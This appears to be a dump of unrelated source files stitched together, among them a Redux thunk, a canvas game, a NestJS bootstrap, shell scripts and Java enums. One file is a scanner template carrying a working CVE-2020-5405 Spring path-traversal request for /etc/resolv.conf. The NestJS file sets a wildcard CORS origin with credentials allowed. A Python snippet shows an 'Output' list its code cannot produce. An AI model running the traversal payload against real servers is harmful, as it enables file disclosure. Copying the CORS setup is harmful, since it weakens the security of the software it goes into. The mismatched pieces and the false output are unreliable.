<gh_stars>0 import { API } from 'aws-amplify' export const GET_FRIDGE = 'GET_FRIDGE' export const GET_FRIDGE_SUCCESS = 'GET_FRIDGE_SUCCESS' export const GET_FRIDGE_FAILURE = 'GET_FRIDGE_FAILURE' export const ADD_ITEM_TO_FRIDGE = 'ADD_ITEM_TO_FRIDGE' export const AUTHORIZED_USER = 'AUTHORIZED_USER' export const GET_PRODUCTS = 'GET_PRODUCTS' export const LOGOUT = 'LOGOUT' export const CLEAR_PRODUCTS = 'CLEAR_PRODUCTS' // export const GET_USER_FRIDGE = 'GET_USER_FRIDGE' // Create Redux action creators that return an action export const authUser = (user) => ({ type: AUTHORIZED_USER, payload: user, }) export const clearProducts = () => ({ type: CLEAR_PRODUCTS }) export const logout = () => ({ type: LOGOUT, }) export const addToFridge = (itemInfo) => ({ type: ADD_ITEM_TO_FRIDGE, payload: itemInfo }) export const getProducts = (products) => ({ type: GET_PRODUCTS, payload: products }) export const getFridge = () => ({ type: GET_FRIDGE, }) export const getFridgeSuccess = (fridgeItems) => ({ type: GET_FRIDGE_SUCCESS, payload: fridgeItems, }) export const getFridgeFailure = () => ({ type: GET_FRIDGE_FAILURE, }) // export const getUserFridge = (userFridge) => ({ // type: GET_USER_FRIDGE, // payload: userFridge // }) // Combine them all in an asynchronous thunk // export function fetchFridge() { // let apiName = 'globalindextest'; // let path = '/fridgeitems'; // let params = { // response: true, // queryStringParameters: { // username: 'nick80' // } // } // return (dispatch) => { // dispatch(getFridge()) // return API.get(apiName, path, params) // } export function fetchFridge(user) { console.log(user) let apiName = 'globalindextest'; let path = '/fridgeitems'; let params = { response: true, queryStringParameters: { username: user.username } } return async (dispatch) => { dispatch(getFridge()) try { const response = await API.get(apiName, path, params) console.log(response) const data = await response.data console.log(data) dispatch(getFridgeSuccess(data)) } catch (error) { dispatch(getFridgeFailure()) } } }
"use strict;" /* Classes */ const Game = require('./game.js'); const Player = require('./player.js'); const Log = require('./log.js'); const Log2 = require('./log2.js'); const Car = require('./car.js'); /* Global variables */ var canvas = document.getElementById('screen'); var game = new Game(canvas, update, render); var player = new Player({x: 0, y: 240}); var background = new Image(); background.src = 'assets/background.png'; var lives = 3; var log = []; var car = []; for(var i=0; i < 3; i++) { log.push(new Log({ x: 460, y: 100 + 250*i })); log.push(new Log2({ x: 540, y: 0 + 150*i })); log.push(new Log({ x: 620, y: 100 + 200*i })); } for(var i=0; i < 2; i++) { car.push(new Car({ x: 80, y: 0 + 320*i })); car.push(new Car({ x: 240, y: 0 + 320*i })); } car.push(new Car({ x: 160, y: 250 })); car.push(new Car({ x: 315, y: 300 })); window.onkeydown = function(event) { event.preventDefault(); console.log(event); switch(event.keyCode) { // RIGHT case 39: case 68: if(player.state == "idle") { player.state = "right"; player.frame = -1; } break; // LEFT case 37: case 65: if(player.state == "idle") { player.state = "left"; player.frame = -1; } break; // DOWN case 40: case 83: if(player.state == "idle") { player.state = "down"; player.frame = -1; } break; // UP case 38: case 87: if(player.state == "idle") { player.state = "up"; player.frame = -1; } break; } } /** * @function masterLoop * Advances the game in sync with the refresh rate of the screen * @param {DOMHighResTimeStamp} timestamp the current time */ var masterLoop = function(timestamp) { game.loop(timestamp); window.requestAnimationFrame(masterLoop); } masterLoop(performance.now()); /** * @function update * Updates the game state, moving * game objects and handling interactions * between them. * @param {DOMHighResTimeStamp} elapsedTime indicates * the number of milliseconds passed since the last frame. */ function update(elapsedTime) { player.update(elapsedTime); // TODO: Update the game objects log.forEach(function(log) { log.update();}); car.forEach(function(car) { car.update();}); for(var i = 0; i < car.length; i ++){ car[i].speed = player.score/100; } for(var i = 0; i < log.length; i++){ log[i].speed = player.score/100; } if(player.x > 70 && player.x < 375) { car.forEach(checkForCarCrash); } else if (player.x > 455 && player.x < 680) { var onLog = log.some(checkOnLog); if(!onLog) { player.x = 0; player.y = 240; player.frame = 0; player.state = "idle"; player.position = 0; lives --; if(lives == 0) { game.gameOver = true; } } } } /** * @function render * Renders the current game state into a back buffer. * @param {DOMHighResTimeStamp} elapsedTime indicates * the number of milliseconds passed since the last frame. * @param {CanvasRenderingContext2D} ctx the context to render to */ function render(elapsedTime, ctx) { ctx.drawImage(background, 0, 0, canvas.width, canvas.height); log.forEach(function(log){log.render(ctx);}); car.forEach(function(car){car.render(ctx);}); player.render(elapsedTime, ctx); ctx.fillStyle = "yellow"; ctx.font = "bold 16px Arial"; ctx.fillText("Score: " + player.score, 0, 15); ctx.fillStyle = "yellow"; ctx.font = "bold 16px Arial"; ctx.fillText("Lives: " + lives, 1, 30); if(game.gameOver) { ctx.fillStyle = "red"; ctx.font = "bold 32px Arial"; ctx.fillText("Game Over", 760/2 - 90, 480/2); } } function checkForCarCrash(car) { var collides = !(player.x + player.width < car.x || player.x > car.x + car.width || player.y + player.height < car.y || player.y > car.y + car.height); if(collides) { player.x = 0; player.y = 240; player.frame = 0; player.state = "idle"; player.position = 0; lives --; if(lives == 0) { game.gameOver = true; } } } function checkOnLog(log) { var collides = !(player.x + player.width < log.x || player.x > log.x + log.width || player.y + player.height < log.y || player.y > log.y + log.height); return collides; }
<reponame>darrendanvers/exp-download package blog.drmidnite.expdownloadapi; import java.io.IOException; import javax.servlet.http.HttpServletResponse; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.RestController; @RestController public class Endpoint { // Basic test, accessible at http://localhost:8080/. @GetMapping public String get() { return "OK"; } // Mocks up an endpoint that is generating a file for download. Accessible at http://localhost:8080/test/download.txt. // You can replace "test" with whatever. @GetMapping("/{id}/download.txt") public void doDownload(@PathVariable("id")String id, HttpServletResponse response) throws IOException { response.getWriter().print("You requested resource "); response.getWriter().print(id); response.getWriter().println(" from the Java server."); } }
// global variables below let inner, tileWidth, tileHeight; let radius = 100; let tiles = 1;//tiles per side let height = 100 * radius / 2 * 3 ** 0.5 * tiles; let width = 30 * radius * tiles; while(width > height) { width -= radius } function mouseClicked() { background(random(80, 180), random(60, 100), 100); // background(240, 245, 255); for (let y = 0; y <= height / radius + 10; y ++) { for (let x = 0; x <= width / (3 * radius); x ++) { centY = (y + 0) * radius / 2 * (3 ** 0.5); centX = x * 3 * radius + radius * ((y+ 1) % 2) * 1.5; if (centY <= random(300, height + 100)) { makeRect(centX, centY, random(5, max(5, (height - centY) / 35))); } } } save("polygonalrain.jpg"); } function makeRect(centerX, centerY, n) { for (let i = 0; i < n; i++) { thisRadius = random(0, radius); fill(random(80, 180), random(60, 100), 100); beginShape(); for (let angle = 0; angle < 360; angle += 60) { currentRadius = max(0, min(radius, randomGaussian(thisRadius, radius / 20))); vertex(centerX + currentRadius * cos(angle), centerY + currentRadius * sin(angle)); } endShape(CLOSE); } } function setup() { inner = document.getElementById('P5Canvas').getBoundingClientRect(); let canvas = createCanvas(width, height); canvas.parent('P5Canvas'); document.getElementById('clearButton').onclick = function() {clearCanvas()} document.getElementById('saveButton').onclick = function() { saveCanvas('myCanvas', 'png'); } // additional setup stroke(35, 17, 10, 255); noFill(); noStroke(); angleMode(DEGREES); mouseClicked(); } function clearCanvas() { let inner = document.getElementById('P5Canvas').getBoundingClientRect(); clear(); }
import {NestFactory} from '@nestjs/core'; import {AppModule} from './app.module'; async function bootstrap() { const app = await NestFactory.create(AppModule, {cors: true}); app.use(function (req, res, next) { const allowedOrigins = ['http://127.0.0.1:3000', 'http://localhost:3000', 'http://localhost:4200', 'https://manage.dein.li']; const origin = req.headers.origin; if (allowedOrigins.indexOf(origin) > -1) { res.setHeader('Access-Control-Allow-Origin', origin); } res.setHeader('Access-Control-Allow-Origin', '*'); res.header('Access-Control-Allow-Methods', 'GET, OPTIONS, POST, PUT, DELETE, HEAD'); res.header('Access-Control-Allow-Headers', 'Content-Type, Authorization, If-None-Match'); res.header('Access-Control-Allow-Credentials', true); res.header('access-control-expose-headers', 'etag'); return next(); }); await app.listen(3000); } bootstrap();
<filename>src/app/libs/date.spec.ts import * as date from './date'; describe('a date module', () => { it('should contain method now', () => { expect(date.now).toEqual(jasmine.any(Function)); }); describe('method now', () => { it('should return a number', () => { expect(date.now()).toEqual(jasmine.any(Number)); }); it('should return a number if using polyfill', () => { expect(date.polyfill.now()).toEqual(jasmine.any(Number)); }); }); });
#!/bin/sh # # Copyright (c) 2012-2015 Andrea Selva # echo " " echo " ___ ___ _ _ ___ ________ _____ _____ " echo " | \/ | | | | | | \/ | _ |_ _|_ _| " echo " | . . | ___ __ _ _ _ ___| |_| |_ ___ | . . | | | | | | | | " echo " | |\/| |/ _ \ / _\ | | | |/ _ \ __| __/ _ \ | |\/| | | | | | | | | " echo " | | | | (_) | (_| | |_| | __/ |_| || __/ | | | \ \/' / | | | | " echo " \_| |_/\___/ \__, |\__,_|\___|\__|\__\___| \_| |_/\_/\_\ \_/ \_/ " echo " | | " echo " |_| " echo " " echo " version: 0.16-SNAPSHOT " cd "$(dirname "$0")" # resolve links - $0 may be a softlink PRG="$0" while [ -h "$PRG" ]; do ls=`ls -ld "$PRG"` link=`expr "$ls" : '.*-> \(.*\)$'` if expr "$link" : '/.*' > /dev/null; then PRG="$link" else PRG=`dirname "$PRG"`/"$link" fi done # Get standard environment variables PRGDIR=`dirname "$PRG"` # Only set MOQUETTE_HOME if not already set [ -f "$MOQUETTE_HOME"/bin/moquette.sh ] || MOQUETTE_HOME=`cd "$PRGDIR/.." ; pwd` export MOQUETTE_HOME # Set JavaHome if it exists if [ -f "${JAVA_HOME}/bin/java" ]; then JAVA=${JAVA_HOME}/bin/java else JAVA=java fi export JAVA LOG_FILE=$MOQUETTE_HOME/config/moquette-log.properties MOQUETTE_PATH=$MOQUETTE_HOME/ #LOG_CONSOLE_LEVEL=info #LOG_FILE_LEVEL=fine JAVA_OPTS_SCRIPT="-XX:+HeapDumpOnOutOfMemoryError -Djava.awt.headless=true" ## Use the Hotspot garbage-first collector. JAVA_OPTS="$JAVA_OPTS -XX:+UseG1GC" ## Have the JVM do less remembered set work during STW, instead ## preferring concurrent GC. Reduces p99.9 latency. JAVA_OPTS="$JAVA_OPTS -XX:G1RSetUpdatingPauseTimePercent=5" ## Main G1GC tunable: lowering the pause target will lower throughput and vise versa. ## 200ms is the JVM default and lowest viable setting ## 1000ms increases throughput. Keep it smaller than the timeouts. JAVA_OPTS="$JAVA_OPTS -XX:MaxGCPauseMillis=500" ## Optional G1 Settings # Save CPU time on large (>= 16GB) heaps by delaying region scanning # until the heap is 70% full. The default in Hotspot 8u40 is 40%. #JAVA_OPTS="$JAVA_OPTS -XX:InitiatingHeapOccupancyPercent=70" # For systems with > 8 cores, the default ParallelGCThreads is 5/8 the number of logical cores. # Otherwise equal to the number of cores when 8 or less. # Machines with > 10 cores should try setting these to <= full cores. #JAVA_OPTS="$JAVA_OPTS -XX:ParallelGCThreads=16" # By default, ConcGCThreads is 1/4 of ParallelGCThreads. # Setting both to the same value can reduce STW durations. #JAVA_OPTS="$JAVA_OPTS -XX:ConcGCThreads=16" ### GC logging options -- uncomment to enable JAVA_OPTS="$JAVA_OPTS -XX:+PrintGCDetails" #JAVA_OPTS="$JAVA_OPTS -XX:+PrintGCDateStamps" #JAVA_OPTS="$JAVA_OPTS -XX:+PrintHeapAtGC" #JAVA_OPTS="$JAVA_OPTS -XX:+PrintTenuringDistribution" #JAVA_OPTS="$JAVA_OPTS -XX:+PrintGCApplicationStoppedTime" #JAVA_OPTS="$JAVA_OPTS -XX:+PrintPromotionFailure" #JAVA_OPTS="$JAVA_OPTS -XX:PrintFLSStatistics=1" #JAVA_OPTS="$JAVA_OPTS -Xloggc:/var/log/moquette/gc.log" JAVA_OPTS="$JAVA_OPTS -Xloggc:$MOQUETTE_HOME/gc.log" #JAVA_OPTS="$JAVA_OPTS -XX:+UseGCLogFileRotation" #JAVA_OPTS="$JAVA_OPTS -XX:NumberOfGCLogFiles=10" #JAVA_OPTS="$JAVA_OPTS -XX:GCLogFileSize=10M" JAVA_OPTS="$JAVA_OPTS -Dio.netty.leakDetectionLevel=paranoid" echo '$JAVA -server $JAVA_OPTS $JAVA_OPTS_SCRIPT -Dlog4j.configuration="file:$LOG_FILE" -Dmoquette.path="$MOQUETTE_PATH" -cp "$MOQUETTE_HOME/lib/*" io.moquette.broker.Server' $JAVA -server $JAVA_OPTS $JAVA_OPTS_SCRIPT -Dlog4j.configuration="file:$LOG_FILE" -Dmoquette.path="$MOQUETTE_PATH" -cp "$MOQUETTE_HOME/lib/*" io.moquette.broker.Server
def calculateFrameTime(): fps = 60 frame_time = 1000 / fps # Calculate the time in milliseconds for each frame return frame_time
<gh_stars>0 import shutil import pathlib import pytest @pytest.fixture def doculect_dir(tmp_path): d = tmp_path / 'doculect' shutil.copytree(pathlib.Path(__file__).parent / 'doculect', d) return d
def generate_list(n): lst = [] for i in range(1, n+1): lst.append(i) return lst
/* * */ package net.community.chest.awt.event; import java.awt.event.MouseEvent; import java.awt.event.MouseListener; import java.util.Arrays; import java.util.Collections; import java.util.List; import net.community.chest.util.collection.CollectionsUtils; /** * <P>Copyright GPLv2</P> * * @author <NAME>. * @since May 4, 2009 12:01:16 PM */ public enum MouseEventType implements ListenerEventEnum<MouseListener,MouseEvent> { CLICKED(MouseEvent.MOUSE_CLICKED) { /* * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent) */ @Override public void invoke (MouseListener l, MouseEvent e) { if ((null == l) || (null == e)) return; // debug breakpoint l.mouseClicked(e); } }, PRESSED(MouseEvent.MOUSE_PRESSED) { /* * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent) */ @Override public void invoke (MouseListener l, MouseEvent e) { if ((null == l) || (null == e)) return; // debug breakpoint l.mousePressed(e); } }, RELEASED(MouseEvent.MOUSE_RELEASED) { /* * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent) */ @Override public void invoke (MouseListener l, MouseEvent e) { if ((null == l) || (null == e)) return; // debug breakpoint l.mouseReleased(e); } }, ENTERED(MouseEvent.MOUSE_ENTERED) { /* * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent) */ @Override public void invoke (MouseListener l, MouseEvent e) { if ((null == l) || (null == e)) return; // debug breakpoint l.mouseEntered(e); } }, EXITED(MouseEvent.MOUSE_EXITED) { /* * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent) */ @Override public void invoke (MouseListener l, MouseEvent e) { if ((null == l) || (null == e)) return; // debug breakpoint l.mouseExited(e); } }; private final int _eventId; /* * @see net.community.chest.awt.event.ListenerEventEnum#getEventId() */ @Override public final int getEventId () { return _eventId; } /* * @see net.community.chest.awt.event.ListenerEventEnum#getEventClass() */ @Override public final Class<MouseEvent> getEventClass () { return MouseEvent.class; } /* * @see net.community.chest.awt.event.ListenerEventEnum#getListenerClass() */ @Override public final Class<MouseListener> getListenerClass () { return MouseListener.class; } MouseEventType (int eventId) { _eventId = eventId; } public static final List<MouseEventType> VALUES=Collections.unmodifiableList(Arrays.asList(values())); public static final MouseEventType fromString (final String s) { return CollectionsUtils.fromString(VALUES, s, false); } public static final MouseEventType fromEventId (final int id) { return ListenerEventEnumUtils.fromEventId(id, VALUES); } public static final MouseEventType fromEventId (final MouseEvent e) { return (null == e) ? null : fromEventId(e.getID()); } }
package io.dronefleet.mavlink.common; import io.dronefleet.mavlink.annotations.MavlinkEntryInfo; import io.dronefleet.mavlink.annotations.MavlinkEnum; /** * Bitmap to indicate which dimensions should be ignored by the vehicle: a value of * 0b0000000000000000 or 0b0000001000000000 indicates that none of the setpoint dimensions * should be ignored. If bit 9 is set the floats afx afy afz should be interpreted as force instead of * acceleration. */ @MavlinkEnum public enum PositionTargetTypemask { /** * Ignore position x */ @MavlinkEntryInfo(1) POSITION_TARGET_TYPEMASK_X_IGNORE, /** * Ignore position y */ @MavlinkEntryInfo(2) POSITION_TARGET_TYPEMASK_Y_IGNORE, /** * Ignore position z */ @MavlinkEntryInfo(4) POSITION_TARGET_TYPEMASK_Z_IGNORE, /** * Ignore velocity x */ @MavlinkEntryInfo(8) POSITION_TARGET_TYPEMASK_VX_IGNORE, /** * Ignore velocity y */ @MavlinkEntryInfo(16) POSITION_TARGET_TYPEMASK_VY_IGNORE, /** * Ignore velocity z */ @MavlinkEntryInfo(32) POSITION_TARGET_TYPEMASK_VZ_IGNORE, /** * Ignore acceleration x */ @MavlinkEntryInfo(64) POSITION_TARGET_TYPEMASK_AX_IGNORE, /** * Ignore acceleration y */ @MavlinkEntryInfo(128) POSITION_TARGET_TYPEMASK_AY_IGNORE, /** * Ignore acceleration z */ @MavlinkEntryInfo(256) POSITION_TARGET_TYPEMASK_AZ_IGNORE, /** * Use force instead of acceleration */ @MavlinkEntryInfo(512) POSITION_TARGET_TYPEMASK_FORCE_SET, /** * Ignore yaw */ @MavlinkEntryInfo(1024) POSITION_TARGET_TYPEMASK_YAW_IGNORE, /** * Ignore yaw rate */ @MavlinkEntryInfo(2048) POSITION_TARGET_TYPEMASK_YAW_RATE_IGNORE }
def reverseSort(string): string_list = string.split() string_list.sort(reverse=True) return string_list if __name__ == '__main__': string = "The quick brown fox jumps over the lazy dog" result_list = reverseSort(string) print(result_list) Output: ['over', 'lazy', 'jumps', 'fox', 'brown', 'quick', 'The', 'dog']
#!/bin/bash #SBATCH --nodes=1 #SBATCH --ntasks=8 #SBATCH --mem=16gb module load sra-tools cd /gpfs/group/pipkin/hdiao/T_Cell_ChIP/0_fastq fastq-dump -I --split-files SRR5217328 & fastq-dump -I --split-files SRR5217329 & fastq-dump -I --split-files SRR4437321 & fastq-dump -I --split-files SRR4437322 & fastq-dump -I --split-files SRR4437323 & fastq-dump -I --split-files SRR4437324 & fastq-dump -I --split-files SRR4437325 & fastq-dump -I --split-files SRR4437326 wait fastq-dump -I --split-files SRR4437327 & fastq-dump -I --split-files SRR4437328 & fastq-dump -I --split-files SRR4437329 & fastq-dump -I --split-files SRR4437330 & fastq-dump -I --split-files SRR4437331 & fastq-dump -I --split-files SRR4437332 & fastq-dump -I --split-files SRR4437333 & fastq-dump -I --split-files SRR4437334
#!/bin/bash # change the environment name to OpenCabinetDoor, OpenCabinetDrawer, PushChair, or MoveBucket # change the network config # increase eval_cfg.num_procs for parallel evaluation model_list=$(python -c "import mani_skill, os, os.path as osp; print(osp.abspath(osp.join(osp.dirname(mani_skill.__file__), 'assets', 'config_files', 'cabinet_models_door.yml')))") echo ${model_list} python -m tools.run_rl configs/bc/mani_skill_point_cloud_transformer8.py --gpu-ids=1 \ --work-dir=./work_dirs/bc_pointnet_transformer_door8_6/ \ --cfg-options "train_mfrl_cfg.total_steps=150000" "train_mfrl_cfg.init_replay_buffers=" \ "train_mfrl_cfg.init_replay_with_split=[\"./full_mani_skill_data/OpenCabinetDoor/\",\"$model_list\"]" \ "env_cfg.env_name=OpenCabinetDoor-v0" "eval_cfg.num=100" "eval_cfg.num_procs=1" "train_mfrl_cfg.n_eval=10000" \ "agent.policy_cfg.nn_cfg.matrix_index=6" # python -m tools.run_rl configs/bc/mani_skill_point_cloud_transformer.py --gpu-ids=0 \ # --work-dir=./work_dirs/base_bc_point_transformer_door/ \ # --cfg-options "train_mfrl_cfg.total_steps=150000" \ # "env_cfg.env_name=OpenCabinetDoor-v0" "eval_cfg.num=100" "eval_cfg.num_procs=1" "train_mfrl_cfg.n_eval=10000"
package route import ( httpRoute "github.com/quicklygabbing/http/pkg/http/route" "github.com/quicklygabbing/users/internal/pkg/http/request" internalRoute "github.com/quicklygabbing/users/internal/pkg/http/route" ) type route struct { request request.Interface } func NewRoute() internalRoute.Interface { return &route{request: request.NewRequest()} } func (r *route) GetRoutes() []httpRoute.Routes { return []httpRoute.Routes{ r.registration(), r.signIn(), } } func (r *route) registration() httpRoute.Routes { return httpRoute.Routes{ Route: `/registration`, Methods: []string{httpRoute.POST, httpRoute.GET}, Handle: r.request.Registration, } } func (r *route) signIn() httpRoute.Routes { return httpRoute.Routes{ Route: `/sign-in`, Methods: []string{httpRoute.POST, httpRoute.GET}, Handle: r.request.SignIn, } }
<reponame>lucasliet/casa_do_codigo<gh_stars>0 package br.com.casadocodigo.loja.daos; import java.util.List; import javax.persistence.EntityManager; import javax.persistence.PersistenceContext; import br.com.casadocodigo.loja.models.Autor; public class AutorDao { @PersistenceContext private EntityManager manager; public List<Autor> listar() { return manager.createQuery( "select a from Autor a", Autor.class) .getResultList(); } }
<filename>artifacts/spring-workshop/dao/src/main/java/com/vmware/spring/workshop/dao/api/BranchDao.java package com.vmware.spring.workshop.dao.api; import java.util.List; import org.springframework.data.repository.query.Param; import com.vmware.spring.workshop.dao.IdentifiedCommonOperationsDao; import com.vmware.spring.workshop.model.Identified; import com.vmware.spring.workshop.model.banking.Branch; /** * @author lgoldstein */ public interface BranchDao extends IdentifiedCommonOperationsDao<Branch> { Branch findByBranchCode (@Param("code") int code); Branch findByBranchName (@Param("name") String name); List<Branch> findByBankId (@Param(Identified.ID_COL_NAME) Long bankId); List<Branch> findByBranchBankCode (@Param("code") int bankCode); /** * @param location A sub-string of the location * @return A {@link List} of all matching {@link Branch}-es whose location * contains the specified parameter (case <U>insensitive</U>) */ List<Branch> findByBranchLocation (@Param("location") String location); }
echo "####################################################################" echo "## Full Test Scripts for CB-Spider IID Working Version - 2020.04.22." echo "## 1. VPC: Create -> List -> Get" echo "## 2. SecurityGroup: Create -> List -> Get" echo "## 3. KeyPair: Create -> List -> Get" echo "## 4. VM: multiple #n StartVM" echo "## 5. VM: List -> ListStatus" echo "## ---------------------------------" echo "## 4. VM: Terminate(#n)" echo "## 3. KeyPair: Delete" echo "## 2. SecurityGroup: Delete" echo "## 1. VPC: Delete" echo "####################################################################" echo "####################################################################" echo "## 1. VPC: Create -> List -> Get" echo "####################################################################" curl -sX POST http://localhost:1024/spider/vpc -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "vpc-01", "IPv4_CIDR": "192.168.0.0/16", "SubnetInfoList": [ { "Name": "subnet-01", "IPv4_CIDR": "192.168.1.0/24"} ] } }' |json_pp curl -sX GET http://localhost:1024/spider/vpc -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp curl -sX GET http://localhost:1024/spider/vpc/vpc-01 -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp echo "#-----------------------------" echo "####################################################################" echo "## 2. SecurityGroup: Create -> List -> Get" echo "####################################################################" curl -sX POST http://localhost:1024/spider/securitygroup -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "sg-01", "VPCName": "vpc-01", "SecurityRules": [ {"FromPort": "1", "ToPort" : "65535", "IPProtocol" : "tcp", "Direction" : "inbound"} ] } }' |json_pp curl -sX GET http://localhost:1024/spider/securitygroup -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp curl -sX GET http://localhost:1024/spider/securitygroup/sg-01 -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp echo "#-----------------------------" echo "####################################################################" echo "## 3. KeyPair: Create -> List -> Get" echo "####################################################################" curl -sX POST http://localhost:1024/spider/keypair -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "keypair-01" } }' |json_pp curl -sX GET http://localhost:1024/spider/keypair -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp curl -sX GET http://localhost:1024/spider/keypair/keypair-01 -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp echo "#-----------------------------" echo "===========================================================================================================================" echo "===========================================================================================================================" if [ "$1" = "" ]; then max=2 else max=$1 fi echo "####################################################################" echo "## 4. VM: multiple StartVM($max)" echo "####################################################################" for (( num=1; num <= $max; num++ )) do curl -sX POST http://localhost:1024/spider/vm -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'", "ReqInfo": { "Name": "powerkim-vm-test-'${num}'", "ImageName": "'${IMAGE_NAME}'", "VPCName": "vpc-01", "SubnetName": "subnet-01", "SecurityGroupNames": [ "sg-01" ], "VMSpecName": "'${SPEC_NAME}'", "KeyPairName": "keypair-01"} }' |json_pp & done echo "============== sleep 300 after start VM" sleep 300 echo "####################################################################" echo "## 5. VM: List -> ListStatus" echo "####################################################################" curl -sX GET http://localhost:1024/spider/vm -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp echo "#-----------------------------" curl -sX GET http://localhost:1024/spider/vmstatus -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp echo "#-----------------------------" echo "####################################################################" echo "####################################################################" echo "####################################################################" echo "####################################################################" echo "## 4. VM: Terminate($max)" echo "####################################################################" for (( num=1; num <= $max; num++ )) do curl -sX DELETE http://localhost:1024/spider/vm/powerkim-vm-test-${num} -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp & done echo "============== sleep 300 after terminate VM" sleep 300 echo "####################################################################" echo "## 3. KeyPair: Delete" echo "####################################################################" curl -sX DELETE http://localhost:1024/spider/keypair/keypair-01 -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp echo "####################################################################" echo "## 2. SecurityGroup: Delete" echo "####################################################################" curl -sX DELETE http://localhost:1024/spider/securitygroup/sg-01 -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp echo "####################################################################" echo "## 1. VPC: Delete" echo "####################################################################" curl -sX DELETE http://localhost:1024/spider/vpc/vpc-01 -H 'Content-Type: application/json' -d '{ "ConnectionName": "'${CONN_CONFIG}'"}' |json_pp
#!/bin/bash sudo apt-get update sudo apt-get install -y mongodb sudo rm /etc/mongodb.conf
import { shadow } from '../../src/enhancers/' import { buildEmptyThemeFn, buildStyleParamFn } from '../../src/themes/util' test('returns shadow styles', () => { const theme = { ...buildEmptyThemeFn(), siteVariables: { shadows: { small: '0 1px 4px rgba(0, 0, 0, .125)', }, } } const styleParam = buildStyleParamFn( { textShadow: '0 -1px rgba(255, 255, 255, .25)', boxShadow: 'small', }, theme, theme.siteVariables) const style = shadow(styleParam) expect(style).toEqual({ textShadow: '0 -1px rgba(255, 255, 255, .25)', boxShadow: '0 1px 4px rgba(0, 0, 0, .125)', }) })
function findLongestWordLength(string) { let words = string.split(' '); let maxLength = 0; for (let i = 0; i < words.length; i++) { if (words[i].length > maxLength) { maxLength = words[i].length; } } return maxLength; }
<gh_stars>10-100 #include "precompiled.h" #pragma hdrstop #include "BulletMotionState.h" #include <utility> #include "Modules/Graphics/GraphicsSystem/TransformComponent.h" BulletMotionState::BulletMotionState(const btTransform& transform) : m_btTransform(transform) { } BulletMotionState::~BulletMotionState() = default; void BulletMotionState::getWorldTransform(btTransform& worldTrans) const { worldTrans = m_btTransform; } void BulletMotionState::setWorldTransform(const btTransform& worldTrans) { if (m_updateCallback != nullptr) { m_updateCallback(worldTrans); } m_btTransform = worldTrans; } void BulletMotionState::setUpdateCallback(std::function<void(const btTransform&)> updateCallback) { m_updateCallback = std::move(updateCallback); }
/* // The characteristic of the reference types is expressed in the assignment operation! For example: const num = { n: 1 }; console.log(`num = ${num.n}`); const num1 = num; console.log(`num1 = ${num1.n} and num = ${num.n}`); num1.n = 100; console.log(`After change num1: num1 = ${num1.n} and num = ${num.n}`); */ // This указател - дава достъп до свойствата на обекта, когато се споменават в метод в същия! const person = { firstName: 'Jhon', lastName: 'Doe', fullName: function(){ return `${this.firstName} ${this.lastName}`; } }; console.log(person.fullName());
<reponame>DPNT-Sourcecode/CHK-ojia01 'use strict'; module.exports = function (x, y) { return x+y; };
<filename>src/components/DocWrapper/DocInlineCode/index.tsx import React, {FC} from 'react'; import clsx from 'clsx'; import './DocInlineCode.scss'; interface ComponentProps { className?: string; } const DocInlineCode: FC<ComponentProps> = ({children, className}) => { return ( <code className={clsx('DocInlineCode', className)} data-testid="DocInlineCode"> {children} </code> ); }; export default DocInlineCode;
AUTHOR='@xer0dayz' VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2' URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf" METHOD='GET' MATCH="root\:|nameserver|\[extensions\]" SEVERITY='P1 - CRITICAL' CURL_OPTS="--user-agent '' -s -L --insecure" SECONDARY_COMMANDS='' GREP_OPTIONS='-i'
<reponame>rds0751/fec-cms<gh_stars>10-100 (function() { (function($) { // Force hallotoolbar to be full width when possible $(document.body).on('halloactivated', function() { var $toolbar = $('.hallotoolbar'); $toolbar.width('auto'); // Remove re-undo buttons $toolbar.find('.halloreundo.ui-buttonset').remove(); }); })(jQuery); })(this);
